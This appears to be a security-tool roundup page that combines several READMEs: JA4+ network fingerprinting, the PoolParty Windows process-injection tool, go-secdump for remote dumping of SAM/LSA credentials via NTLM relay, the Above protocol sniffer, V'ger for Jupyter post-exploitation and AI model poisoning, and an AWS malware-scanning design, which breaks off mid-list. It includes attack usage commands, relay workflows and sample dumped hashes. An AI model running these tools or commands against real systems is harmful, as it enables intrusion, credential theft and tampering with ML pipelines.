1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
tshark.exe is at the location where Wireshark is installed, for example: C:\Program Files\Wireshark\tshark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd, navigate to the ja4 folder

ja4 [options] [pcap]

Database

An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

In the meantime, see ja4plus-mapping.csv

Feel free to do a pull request with any JA4+ data you find.

JA4+ Details

JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
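Because the sections are underscore-delimited, the JA4_ac pivot is a one-line string operation. A small illustrative Python sketch (the second fingerprint is invented to simulate a changing b section):

from collections import defaultdict

sightings = [  # (JA4 fingerprint, source IP) observations
    ("t13d1516h2_8daaf6152771_02713d6af862", "198.51.100.7"),
    ("t13d1516h2_aaaaaaaaaaaa_02713d6af862", "198.51.100.7"),  # only b changed
]

by_ac = defaultdict(list)
for fp, src in sightings:
    a, b, c = fp.split("_")
    by_ac[f"{a}_{c}"].append(src)  # join a+c, drop the changing b section

for ac, sources in by_ac.items():
    print(ac, sources)  # both sightings collapse to one JA4_ac key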

Current methods and implementation details:
| Full Name | Short Name | Description |
|---|---|---|
| JA4 | JA4 | TLS Client Fingerprinting |
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
| JA4HTTP | JA4H | HTTP Client Fingerprinting |
| JA4Latency | JA4L | Latency Measurement / Light Distance |
| JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
| JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
| JA4TCP | JA4T | TCP Client Fingerprinting |
| JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
| JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |

The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

To understand how to read JA4+ fingerprints, see Technical Details

Licensing

JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO

JA4+ can and is being implemented into open source tools, see the License FAQ for details.

This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

Q&A

Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.
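The effect of sorting is easy to demonstrate. In this toy Python sketch (simplified values, not the real JA4 encoding, though JA4 does truncate a SHA-256 of the canonical list), shuffling the cipher order no longer changes the hashed value once the list is sorted:

import hashlib
import random

def fingerprint(cipher_list):
    # Sort before hashing, so ordering tricks ("cipher stunting") have no effect.
    canonical = ",".join(sorted(cipher_list))
    return hashlib.sha256(canonical.encode()).hexdigest()[:12]

ciphers = ["1301", "1302", "1303", "c02b", "c02f"]
shuffled = ciphers[:]
random.shuffle(shuffled)

assert fingerprint(ciphers) == fingerprint(shuffled)
print(fingerprint(shuffled))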

Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

JA4+ was created by:

John Althouse, with feedback from:

Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

Contact John Althouse at john@foxio.io for licensing and questions.

Copyright (c) 2024, FoxIO



PoolParty - A Set Of Fully-Undetectable Process Injection Techniques Abusing Windows Thread Pools

By: Zion3R


A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title "The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools".


PoolParty Variants

| Variant ID | Variant Description |
|---|---|
| 1 | Overwrite the start routine of the target worker factory |
| 2 | Insert TP_WORK work item to the target process's thread pool |
| 3 | Insert TP_WAIT work item to the target process's thread pool |
| 4 | Insert TP_IO work item to the target process's thread pool |
| 5 | Insert TP_ALPC work item to the target process's thread pool |
| 6 | Insert TP_JOB work item to the target process's thread pool |
| 7 | Insert TP_DIRECT work item to the target process's thread pool |
| 8 | Insert TP_TIMER work item to the target process's thread pool |

Usage

PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

Usage Examples

Insert TP_TIMER work item to process ID 1234

>> PoolParty.exe -V 8 -P 1234

[info] Starting PoolParty attack against process id: 1234
[info] Retrieved handle to the target process: 00000000000000B8
[info] Hijacked worker factory handle from the target process: 0000000000000058
[info] Hijacked timer queue handle from the target process: 0000000000000054
[info] Allocated shellcode memory in the target process: 00000281DBEF0000
[info] Written shellcode to the target process
[info] Retrieved target worker factory basic information
[info] Created TP_TIMER structure associated with the shellcode
[info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info] Written the specially crafted TP_TIMER structure to the target process
[info] Modified the target process's TP_POOL timer queue list entry to point to the specially crafted TP_TIMER
[info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info] PoolParty attack completed successfully

Default Shellcode and Customization

The default shellcode spawns a calculator via the WinExec API.

To customize the executable to run, change the path at the end of the g_Shellcode variable in the main.cpp file.

Author - Alon Leviev



Go-Secdump - Tool To Remotely Dump Secrets From The Windows Registry

By: Zion3R


Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.

The tool is built on top of the library go-smb and uses it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.

It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.

The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local Administrators group had the WriteDACL permission on the registry hives, which can thus be used to temporarily grant itself read access, retrieve the secrets, and then restore the original permissions.


Credits

Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.

Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:

https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

http://www.beginningtoseethelight.org/ntsecurity/index.htm

https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral

Usage

Usage: ./go-secdump [options]

options:
--host <target> Hostname or ip address of remote server
-P, --port <port> SMB Port (default 445)
-d, --domain <domain> Domain name to use for login
-u, --user <username> Username
-p, --pass <pass> Password
-n, --no-pass Disable password prompt and send no credentials
--hash <NT Hash> Hex encoded NT Hash for user password
--local Authenticate as a local user instead of domain user
--dump Saves the SAM and SECURITY hives to disk and
transfers them to the local machine.
--sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
--lsa Extract LSA secrets explicitly. Only other explicit targets are included.
--dcc2 Extract DCC2 caches explicitly. Only other explicit targets are included.
--backup-dacl Save original DACLs to disk before modification
--restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
--backup-file Filename for DACL backup (default dacl.backup)
--relay Start an SMB listener that will relay incoming
NTLM authentications to the remote server and
use that connection. NOTE that this forces SMB 2.1
without encryption.
--relay-port <port> Listening port for relay (default 445)
--socks-host <target> Establish connection via a SOCKS5 proxy server
--socks-port <port> SOCKS5 proxy port (default 1080)
-t, --timeout Dial timeout in seconds (default 5)
--noenc Disable smb encryption
--smb2 Force smb 2.1
--debug Enable debug logging
--verbose Enable verbose logging
-o, --output Filename for writing results (default is stdout). Will append to file if it exists.
-v, --version Show version

Changing DACLs

go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part, such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.

Using the --backup-dacl argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl argument.
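Conceptually, the grant-then-restore flow looks like the following Python pseudocode. All helper functions here are hypothetical stand-ins for remote registry operations, not go-secdump's actual Go API:

# Hypothetical stubs; the real tool performs these steps over the Windows Remote Registry.
def read_dacl(hive_path):
    return b"ORIGINAL_DACL"

def write_dacl(hive_path, dacl):
    print(f"[*] Setting DACL on {hive_path}")

def grant_read(dacl, principal):
    return dacl + b"+READ"

def dump_hive_secrets(hive_path):
    return b"secrets"

def extract(hive_path, backup_file="dacl.backup"):
    original = read_dacl(hive_path)
    with open(backup_file, "wb") as f:       # --backup-dacl: serialized copy on disk
        f.write(original)
    write_dacl(hive_path, grant_read(original, "Administrators"))
    try:
        return dump_hive_secrets(hive_path)  # read SAM/SECURITY while readable
    finally:
        write_dacl(hive_path, original)      # always attempt to restore permissions

print(extract("HKLM\\SAM"))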

Examples

Dump all registry secrets

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
or
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

Dump only SAM, LSA, or DCC2 cache secrets

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

NTLM Relaying

Dump registry secrets using NTLM relaying

Start listener

./go-secdump --host 192.168.0.100 -n --relay

Trigger an auth to your machine from a client with administrative access to 192.168.0.100 somehow and then wait for the dumped secrets.

YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805
YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!
Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
[*] Dumping local SAM hashes
Name: Administrator
RID: 500
NT: 2727D7906A776A77B34D0430EAACD2C5

Name: Guest
RID: 501
NT: <empty>

Name: DefaultAccount
RID: 503
NT: <empty>

Name: WDAGUtilityAccount
RID: 504
NT: <empty>

[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
[*] DPAPI_SYSTEM
dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
[*] NL$KM
NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
[*] Dumping cached domain credentials (domain/username:hash)
DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab
...

SOCKS Proxy

Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality.

When using ntlmrelayx.py as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.

./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server
...

./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080


Above - Invisible Network Protocol Sniffer

By: Zion3R


Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


Above: Invisible network protocol sniffer
Designed for pentesters and security engineers

Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert

Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

It is a specialized network security tool that helps both pentesters and security professionals.

Mechanics

Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. It's invisible. Completely based on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

Supported protocols

Detects up to 27 protocols:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Hot Standby Router Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)

Operating Mechanism

Above works in two modes:

  • Hot mode: Sniffing on your interface specifying a timer
  • Cold mode: Analyzing traffic dumps

The tool is very simple in its operation and is driven by arguments:

  • Interface: Specifying the network interface on which sniffing will be performed
  • Timer: Time during which traffic analysis will be performed
  • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
  • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
  • Passive ARP: Detecting hosts in a segment using Passive ARP
usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)

Information about protocols

The information obtained will be useful not only to the pentester but also to the security engineer, who will know what to pay attention to.

When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

  • Impact: What kind of attack can be performed on this protocol;

  • Tools: What tool can be used to launch an attack;

  • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

  • Mitigation: Recommendations for fixing the security problems

  • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


Installation

Linux

You can install Above directly from the Kali Linux repositories

caster@kali:~$ sudo apt update && sudo apt install above

Or...

caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install

macOS:

# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools

# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install

Don't forget to deactivate your firewall on macOS!

Settings > Network > Firewall


How to Use

Hot mode

Above requires root access for sniffing

Above can be run with or without a timer:

caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + C

WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. The tool may not work properly on tunneled L3 interfaces.

Example:

caster@kali:~$ sudo above --interface eth0 --timer 120

-----------------------------------------------------------------------------------------
[+] Start sniffing...

[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------

If you need to record the sniffed traffic, use the --output argument

caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

If you interrupt the tool with CTRL+C, the traffic is still written to the file

Cold mode

If you already have some recorded traffic, you can use the --input argument to look for potential security issues

caster@kali:~$ above --input ospf-md5.cap

Example:

caster@kali:~$ sudo above --input ospf-md5.cap

[+] Analyzing pcap file...

--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication

Passive ARP

The tool can detect hosts without noise in the air by processing ARP frames in passive mode

caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

[+] Host discovery using Passive ARP

--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
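Since Above is built entirely on Scapy, the essence of this mode fits in a few lines. A simplified sketch, not Above's actual code (interface name and timer are assumptions):

from scapy.all import ARP, sniff

def on_packet(pkt):
    if pkt.haslayer(ARP) and pkt[ARP].op == 2:  # op 2 = is-at (ARP reply)
        print("[+] Detected ARP Reply")
        print(f"[*] ARP Reply for IP: {pkt[ARP].psrc}")
        print(f"[*] MAC Address: {pkt[ARP].hwsrc}")

# Purely passive: listens only, never transmits. Requires root, like Above itself.
sniff(iface="eth0", filter="arp", prn=on_packet, store=False, timeout=10)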

Outro

I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

By: Zion3R

V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

User Stories

  • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
  • As a Red Teamer, you know that some browser-based actions will be visible to the legitimate Jupyter users. For example, modified tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
  • As an AI Red Teamer, you understand academic algorithmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. With V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
  • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

Usage

Initial Setup

  1. pip install vger
  2. vger --help

Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

Commands

Once a connection is established, users drop into a nested set of menus.

The top level menu is:

  • Reset: Configure a different host.
  • Enumerate: Utilities to learn more about the host.
  • Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
  • Persist: Utilities to establish persistence mechanisms.
  • Export: Save output to a text file.
  • Quit: No one likes quitters.

These menus contain the following functionality (a rough sketch of the kind of API access underpinning these actions follows the list):

  • List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
  • Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in the runtime of the notebook.
  • Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root, on a user-specified port with a user-specified password.
  • Check History: See ipython commands recently run in the target notebook.
  • Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
  • List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /.
  • Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
  • Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
  • Find models: Find models based on common file formats.
  • Download models: Download discovered models.
  • Snoop: Monitor notebook execution and results until timeout.
  • Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
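Most of these actions map onto the Jupyter Server REST API. As a rough illustration of what an authenticated token allows (not V'ger's code; host and token are placeholders), listing the active notebook sessions is a single request:

import requests

BASE = "http://target:8888"     # placeholder Jupyter server
TOKEN = "captured-token"        # placeholder credential

resp = requests.get(
    f"{BASE}/api/sessions",
    headers={"Authorization": f"token {TOKEN}"},
    timeout=10,
)
for session in resp.json():
    # Each session exposes the notebook path and its kernel.
    print(session["path"], session["kernel"]["name"])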

Experimental

With pip install vger[ai] you'll get LLM-generated summaries of notebooks in the target environment. These are meant to be a rough translation for non-DS/AI folks to quickly triage whether (or which) notebooks are worth investigating further.

There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

Examples



Drs-Malware-Scan - Perform File-Based Malware Scan On Your On-Prem Servers With AWS

By: Zion3R


Perform malware scan analysis of on-prem servers using AWS services

Challenges with on-premises malware detection

It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to set up and maintain additional security tools for advanced threat detection. A rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.

Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.


How to use AWS services to address these challenges

The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.

This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.

  • AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.

  • Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.

  • AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.

Architecture

Solution description

The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.

  1. AWS DRS is replicating source servers from the on-premises environment to AWS (or from any cloud provider for that matter). For further details about setting up AWS DRS please follow the Quick Start Guide.
  2. Amazon GuardDuty is already enabled.
  3. AWS Security Hub is already enabled.
  4. The Malware Scan solution is triggered by a Schedule Rule in Amazon EventBridge (with prefix DrsMalwareScanStack-ScheduleScanRule). You can adjust the scan frequency as needed (e.g. once a day, once a week, etc.).
  5. The Schedule Rule in Amazon EventBridge triggers the Submit Orders lambda function (with prefix DrsMalwareScanStack-SubmitOrders) which gathers the source servers to scan from the Source Servers DynamoDB table.
  6. Orders are placed on the SQS FIFO queue named Scan Orders (with prefix DrsMalwareScanStack-ScanOrdersfifo). The queue is used to serialize scan requests mapped to the same DRS instance, preventing a race condition (see the queueing sketch after this list).
  7. The Process Order lambda picks a malware scan order from the queue and enriches it, preparing the upcoming malware scan operation. For instance, it inserts the id of the replicating DRS instance associated to the DRS source server provided in the order. The output of Process Order are malware scan commands containing all the necessary information to invoke GuardDuty malware scan.
  8. Malware scan operations are tracked using the DRSVolumeAnnotationsDDBTable at the volume-level, providing reporting capabilities.
  9. Malware scan commands are inserted in the Scan Commands SQS FIFO queue (with prefix DrsMalwareScanStack-ScanCommandsfifo) to increase resiliency.
  10. The Process Commands function submits queued scan commands at a maximum rate of 1 command per second to avoid API throttling. It triggers the on-demand malware scan function provided by Amazon GuardDuty.
  11. The execution of the on-demand Amazon GuardDuty Malware job can be monitored from the Amazon GuardDuty service.
  12. The outcome of the malware scan job is routed to Amazon CloudWatch Logs.
  13. The Subscription Filter lambda function receives the outcome of the scan and tracks the result using DynamoDB (step #14).
  14. The DRS Instance Annotations DynamoDB Table tracks the status of the malware scan job at the instance level.
  15. The CDK stack named ScanReportStack deploys the Scan Report lambda function (with prefix ScanReportStack-ScanReport) to populate the Amazon S3 bucket with prefix scanreportstack-scanreportbucket.
  16. AWS Security Hub aggregates and correlates findings from Amazon GuardDuty.
  17. The Security Hub finding event is caught by an EventBridge Rule (with prefix DrsMalwareScanStack-SecurityHubAnnotationsRule)
  18. The Security Hub Annotations lambda function (with prefix DrsMalwareScanStack-SecurityHubAnnotation) generates additional Notes (Annotations) to the Finding with contextualized information about the source server being affected. This additional information can be seen in the Notes section within the Security Hub Finding.
  19. The follow-up activities will depend on the incident response process being adopted. For example based on the date of the infection, AWS DRS can be used to perform a point in time recovery using a snapshot previous to the date of the malware infection.
  20. In a Multi-Account scenario, this solution can be deployed directly on the AWS account hosting the AWS DRS solution. The Amazon GuardDuty findings will be automatically sent to the centralized Security Account.
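To make the serialization in step 6 concrete, here is a minimal boto3 sketch of placing an order on an SQS FIFO queue. The queue URL and message fields are assumptions for illustration, not the stack's exact schema:

import json
import boto3

sqs = boto3.client("sqs")
QUEUE_URL = "https://sqs.us-east-1.amazonaws.com/111111111111/DrsMalwareScanStack-ScanOrdersfifo.fifo"  # placeholder

def submit_order(source_server_id):
    # Orders sharing a MessageGroupId are delivered in order, so scan requests
    # mapped to the same DRS instance cannot race each other.
    sqs.send_message(
        QueueUrl=QUEUE_URL,
        MessageBody=json.dumps({"sourceServerId": source_server_id}),
        MessageGroupId=source_server_id,
        MessageDeduplicationId=source_server_id,  # dedupe repeated submissions
    )

submit_order("s-1234567890abcdef0")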

Usage

Pre-requisites

  • An AWS Account.
  • Amazon Elastic Disaster Recovery (DRS) configured, with at least 1 source server in sync. If not, please check this documentation. The Replication Configuration must consider EBS encryption using a Customer Managed Key (CMK) from AWS Key Management Service (AWS KMS). Amazon GuardDuty Malware Protection does not support the default AWS managed key for EBS.
  • IAM Privileges to deploy the components of this solution.
  • Amazon GuardDuty enabled. If not, please check this documentation
  • Amazon Security Hub enabled. If not, please check this documentation

    Warning
